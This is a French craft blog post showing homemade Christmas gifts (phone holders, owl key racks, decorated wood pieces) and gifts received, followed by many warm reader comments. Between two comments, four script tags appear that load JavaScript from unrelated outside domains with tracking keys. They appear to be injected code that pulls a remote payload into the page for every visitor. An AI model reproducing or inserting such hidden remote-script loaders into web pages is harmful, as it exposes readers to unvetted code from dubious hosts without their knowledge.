• Noël en Cadeaux

     

     

    Cadeaux faits mains pour Noël et Cadeaux reçus....

     

     

    A Retrouver dans la Rubrique "Fêtes"-"Noël"   ICI

     

     

     

    Et oui, je vous ramène presque un mois en arrière, car je n'avais pas pu le faire jusque là ....

     

     

    Noël en Cadeaux

     

     

    Je viens vous montrer les cadeaux que j'ai confectionnés pour mes grands enfants...

     

    D'une idée sortie de Pinterest qui était celle-ci....

     

     

    Noël en Cadeaux

     

     

    Voici ce que j'ai fait pour mon Fils et ma Fille aînée...

     

     

     

     

     

    Noël en Cadeaux

     

     

     

     

     

    Noël en Cadeaux

     

     

     

     

     

    Noël en Cadeaux

     

     

    Vu sur le Blog de Maminou et suivant le tuto ICI

    J'ai fait des supports téléphone pour tout le monde !!!!

     

     

     

     

     

    Noël en Cadeaux

     

     

     

     

     

    Noël en Cadeaux

     

     

    Mon fils nous a gâtés ....

     

     

    Noël en Cadeaux

     

     

     

     

     

    Noël en Cadeaux

     

     

     

     

     

    Noël en Cadeaux

     

     

    A Retrouver dans la Rubrique "Séparations"-"Hiver,Noël"   ICI

     

     

     

     

     

    Noël en Cadeaux

     

    A Retrouver dans la Rubrique "Bisous"-"Hiver,Noël"   ICI

     

     

     

     

     

    Noël en Cadeaux

     

     

    A Retrouver dans la Rubrique  "Jours"-"Lundi"-"Hiver"   ICI

     

     

     


    Tags Tags : , , , , , , ,
  • Commentaires

    38
    Gaelle
    Vendredi 22 Janvier 2021 à 14:19
    Des cadeaux quils vont garder longtemps et tres jolis et originaux.
    Bravo a toi.
    Biz
    Gaelle
    37
    Jeudi 21 Janvier 2021 à 12:19
    De bien beaux cadeaux, j'aime beaucoup les ranges clés chouettes ! C'est original et très mignon. Super à portable j'avais demandé au Père Noël mais j'ai pas eu. Je vais en fabriquer un avec un rouleau de carton épais. Si j'y arrive je montrerai. Plein de Gros Bisous
    36
    Mardi 19 Janvier 2021 à 22:31
    Très jolis tes cadeaux maisons qui ont sans doute été appréciés vous vous êtes mutuellement bien gâtés Bisous Pierrette67
    35
    Mardi 19 Janvier 2021 à 20:50

    Bonsoir ma chère Valie

    J'espère que tes soucis avec Internet se sont arrangé

    Un petit coucou du soir pour te souhaiter une bonne soirée et de gros bisous pour toi et ta fille

    ton amie Janine

    34
    Mardi 19 Janvier 2021 à 11:51

    très bel échange de présents ! super

    bisous

    33
    Mardi 19 Janvier 2021 à 00:04

    C'est super tous ces cadeaux utiles et fait mains en plus !

    Ton fils vous a fait du rhum arrangé mais il faudra ne pas trop en consommer au moment d'appliquer tes jolis tampons lol !

    Bisous

    32
    Lundi 18 Janvier 2021 à 22:48

    J'aime beaucoup tes créations sur bois c'est vraiment joli ! tu es douée en couture et ces petits supports seront bien utiles. Vous vous êtes fait de jolis cadeaux les uns les autres, bravo.

    Bonne fin de soirée ; bisous / Nicole

    31
    JO
    Lundi 18 Janvier 2021 à 21:27

    Coucou ma Valie

    Wouah!!! mais tu excelles en tout, c'est pas croyable!!!

    Quelle belle réussite, BRAVO superbes cadeaux pour tes enfants et celui de ton fils n'est pas des moindres, beau cadeau aussi♥♥♥

    Bonne soirée, prends soin de toi mon amie

    BISOUS DOUX

    JO qui pense très fort à toi♥♥♥♥

    30
    Lundi 18 Janvier 2021 à 20:45

    de jolis cadeaux pour tes enfants  bisous liliane

    29
    Lundi 18 Janvier 2021 à 19:55

    C'est magnifique, bravo chère Valie.  Toujours autant de talent!!!

     

    28
    Lundi 18 Janvier 2021 à 19:32

    Bonsoir ma chère Valie

    De bien beaux cadeaux pour tes enfants et de la part de ton fils

    Je pense que tu es de retour dans ton mobil Home ?

    Bonne soirée pour toi et ta fille

    Gros bisous 

    ton amie Janine

    27
    Lundi 18 Janvier 2021 à 18:35
    lamanuelle25

    De super jolis cadeaux made by Valie, j'aime bien ton support de téléphone!! bises Nadine

    26
    Lundi 18 Janvier 2021 à 18:08

    Bonsoir ma chère Valie

    Bravo pour ces beaux cadeaux réalisés au profit de tes enfants! Bravo aussi pour la créativité!!! c'est super

    Bonne semaine et belle soirée à toi!

    Gros bisous tendresse

    25
    Lundi 18 Janvier 2021 à 17:15

    Allô ma belle Valie, tu as fait de magnifiques cadeaux pour tes enfants, mes petits doigts agiles... Un gros merci aussi pour les jolies créations que tu as fait pour nous. Passe une bonne semaine, gros bisous !

    24
    Jacline-H-49
    Lundi 18 Janvier 2021 à 16:38

    Coucou ma Valie,

    En voilà de beaux cadeaux des deux côtés, les tiens faits maison sont originaux, utiles et chouettes ! Félicitations ♥ 

    Ciel gris ce lundi, y en a marre !!! Et j'ai froid en plus.

    Et de ton côté, quel temps ??

    Bonne fin de journée avec mes 

    GROS GROS BISOUS TENDRESSE

    Jacline

     

    23
    Lundi 18 Janvier 2021 à 15:13

    super idée récup pour tes cadeaux 

    ouh la bouteille d'alcool avec modération par contre hein ?? LOL 

    bisous à bientot 

    22
    Lundi 18 Janvier 2021 à 14:39

    Les cadeaux faits maison ce sont bien les meilleurs ! Bravo Valie !

    Bisous bisous !

    21
    mamijojo77100
    Lundi 18 Janvier 2021 à 13:46

    jamais a court d idee notre valie !!! et fait maison tout est naturel.. et pour le reste tu me garde le fond de la bouteille !!  ca me rappele un voyage par la ou on a bu l appero dans l eau autour du bateau. il n y avait pas le virus !!!!  gbisous joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1610973803461" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    20
    Lundi 18 Janvier 2021 à 13:25
    dane

    coucou de jolies créations et réalisations de bonnes idées félicitations c' est super sympa, tu sais lorsque nous avions été sur l' ile de la réunion nous avions pris tout ce qu' il faut pour faire nos petits punchs nous avions fait un colis que nous avions envoyer par la poste sinon a l' aéroport cela  nous aurait couter trop cher, des bons souvenirs !! je te fais de gros bisous a bientôt  

    19
    Lundi 18 Janvier 2021 à 13:12

    Tu n'es jamais à court d'idées, et fait toujours des petites merveilles

    Du beau travail comme tu sait si bien le faire

    Bon début de semaine

    Gros bisous

     

    18
    Lundi 18 Janvier 2021 à 11:56

    De bel échange de cadeaux et superbes tes créations!! Super idée tes supports de téléphone et tes petites chouettes..... Tu as des doigts de fée.

    Bisous et douce journée

    17
    marianne pirotte
    Lundi 18 Janvier 2021 à 11:30

    Super tous ces cadeaux, trop cool ton porte téléphone, j'adore !!

    Gros bisous

    Marianne

    16
    Jeannine (cristal24)
    Lundi 18 Janvier 2021 à 11:10

    Très beaux cadeaux de chacun.

    C'est super chouette, les chouettes.  Belles idées.

    Bonne semaine.  A bientôt.

    Bises.

    Jeannine

    15
    Lundi 18 Janvier 2021 à 11:00

      de  bien  joilis  cadeaux   "fait  maison"   bravo 

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    14
    Lundi 18 Janvier 2021 à 10:59

    Tu as toujours des idées géniales et ça c'est fabuleux...Merci à Toi de partager et de montrer

    combien c'est agréable de faire des petites choses

    comme ça qui apportent du pratique et de jolis décos.

    J'adore tes idées.Bravoooo...

    J'espère que tu vas bien.

    Plein de gros bisous.

    Bonne semaine...Brrr...fait frisquet, mais un vrai hiver

    enfin...A bientôt*Merci*

    13
    Lundi 18 Janvier 2021 à 10:08

    hello Valie 

    Que de belles réalisations , je suis en admiration !

    comme je l'ai déjà dit , tu as des doigts de fée 

     J'aime regarder tomber la neige mais hélas , il n'y en a pas chez nous.

     3° ce matin , pas de vent , il fait bon  mais humide , hélas 

    Rien de bien neuf ! 

    passe une bonne semaine 

    bisous

    12
    Lundi 18 Janvier 2021 à 09:57
    De belles réas et de beaux échanges. Bises.
    11
    Lundi 18 Janvier 2021 à 09:49

    Coucou Valie 

    que de beaux échanges partagés, des moments de bonheur

    Bises bonne semaine

    10
    Lundi 18 Janvier 2021 à 09:18

    Bonjour Valie 

    oh que c'est beau ! tu réalises des superbes choses . de jolis cadeaux  tes enfants doivent être supers contents . Pendant un moment je travaillais avec du papier de soie sur des bases en bois et en verre que je collais avec un pinceau cela rendait super bien .   Bravo Valie . du beau travail . je crois bien qu'il va encore neigé . je vais rester bien au chaud . Belle et douce journée . Amitié et gros bisous .

    9
    Jour de mai
    Lundi 18 Janvier 2021 à 09:16

    Coucou Valie, 

    Bravo à toi, toujours de très bonnes idées, c'est très "chouette". Des cadeaux maisons quoi de plus agréables. 

    Tu as gâté les tiens mais en plus vous avez été gâtés et ce n'est pas du n'importe quoi. 

    Bon courage pour la reprise de ta puce et pour vous nouvelle aventure au mobil home. 

    Belle semaine en attendant ton prochain billet. 

    Gros bisous ♥♥♥♥

    LN

     

    8
    Lundi 18 Janvier 2021 à 08:40

    Rigolote tes décorations ! et bien "chouette" !! 
    Bonne idée que tes supports à téléphone ! L'année dernière je galérais pour arriver à le faire tenir pendant mes réunions visios. Donc ton système est idéal ! 

    Bises

    Thaly

    7
    Lundi 18 Janvier 2021 à 08:24

    De jolis présents réalisés avec amour , c'est tout mignon!

    Bisous et belle journée

    6
    Lundi 18 Janvier 2021 à 08:07

    Très bel échange de présents, du fait maison cela fait toujours chaud au cœur !!!

    Prends bien soin de toi, Doux Bisous ma tite Valie.

    5
    Lundi 18 Janvier 2021 à 08:04

    Superbes créations.

    Chez nous aussi tout le monde à eu son porte téléphone.

    Vous avez été gâtés

    Bonne journée. Bisous

    4
    Lundi 18 Janvier 2021 à 07:51

    plein de jolis cadeaux, bravo!! bisous et bonne semaine prends soin de toi

    3
    Lundi 18 Janvier 2021 à 07:44

    Bonjour ma Valie, tu as toujours de superbes idées !! C'est vraiment superbe tout ce que tu as réalisé

    Bravo à toi

    Passe une bonne semaine

    Bisous de Pat

    2
    Lundi 18 Janvier 2021 à 07:36

    Coucou ma Valie et bon lundi, glaçé ici dernière semaine pour moi et il reste tant à faire

    Tu les a gaté et ils t on gaté le rhum Charette c est le meilleur celui de la Réunion je connais bien , j ai des souvenirs assez chauds , bisous ma douce et prends soin de toi surtout 

    1
    Qinoa
    Lundi 18 Janvier 2021 à 07:36
    Belle idée que ces petites chouettes et les coussin Bien pratique
    Bzz et douce journée
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :